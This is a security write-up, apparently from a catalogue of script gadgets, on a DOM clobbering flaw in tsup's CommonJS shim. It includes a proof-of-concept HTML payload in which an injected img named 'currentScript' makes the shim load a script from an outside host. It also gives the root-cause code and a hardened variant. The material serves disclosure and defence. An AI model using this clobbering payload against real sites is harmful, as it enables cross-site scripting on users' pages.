The simplest and fastest way to bundle your TypeScript libraries.
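Tsup translated import.meta.url to document.currentScript in cjs_shims.js to determine the URL of the current script. Because a named element shadows properties of document, injected markup with name="currentScript" is returned in place of the running script element, and its src is used as that URL.
The CVE advisory mentions versions ≤8.3.4, but the gadget appears to still work in the latest version (8.5.0).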
<!-- user input -->
<img name="currentScript" src="https://gmsgadget.com/assets/xss/index.js">
<script nonce="secret" src="https://gmsgadget.com/assets/libs/tsup/index.js?"></script>
Root Cause
Source: https://github.com/egoist/tsup/blob/92ee84251f7c5dad7691f6052eb8b767899e0cff/assets/cjs_shims.js#L6
const getImportMetaUrl = () =>
  typeof document === 'undefined'
    ? new URL(`file:${__filename}`).href
    : (document.currentScript && document.currentScript.src) ||
      new URL('main.js', document.baseURI).href

export const importMetaUrl = /* @__PURE__ */ getImportMetaUrl()
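A hardened variant of the shim's browser branch, next to the original behaviour, as an added example (not tsup's code and not its fix). The names isRealScriptElement, originalImportMetaUrl and hardenedImportMetaUrl, the doc parameter and all sample URLs are assumptions; the mock documents are constructed stand-ins so the check runs under Node.

```javascript
// Named access on `document` can return any element whose name matches,
// so confirm the node really is a <script> before trusting its `src`.
function isRealScriptElement(node) {
  return (
    node !== null &&
    typeof node === 'object' &&
    typeof node.tagName === 'string' && // reject a tagName that is not a plain string
    node.tagName.toUpperCase() === 'SCRIPT' &&
    typeof node.src === 'string' &&
    node.src !== ''
  )
}

// Behaviour of the original shim's browser branch, kept for comparison.
// `doc` is a document-like object; in a browser, pass the real `document`.
function originalImportMetaUrl(doc) {
  return (doc.currentScript && doc.currentScript.src) ||
    new URL('main.js', doc.baseURI).href
}

// Falls back to baseURI whenever currentScript is not a genuine script element.
function hardenedImportMetaUrl(doc) {
  const script = doc.currentScript
  return isRealScriptElement(script)
    ? script.src
    : new URL('main.js', doc.baseURI).href
}

// Constructed stand-ins for what the browser exposes (not real DOM objects).
const BASE = 'https://app.example/page/'
const clobberedDoc = {
  baseURI: BASE,
  // models <img name="currentScript" src="..."> shadowing document.currentScript
  currentScript: { tagName: 'IMG', src: 'https://untrusted.example/x.js' },
}
const normalDoc = {
  baseURI: BASE,
  currentScript: { tagName: 'SCRIPT', src: 'https://app.example/assets/index.js' },
}
// Inside a module script, document.currentScript is null.
const moduleDoc = { baseURI: BASE, currentScript: null }
```

In a browser, an instanceof HTMLScriptElement test can replace the tagName comparison.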
Found by jackfromeast, ishmeals.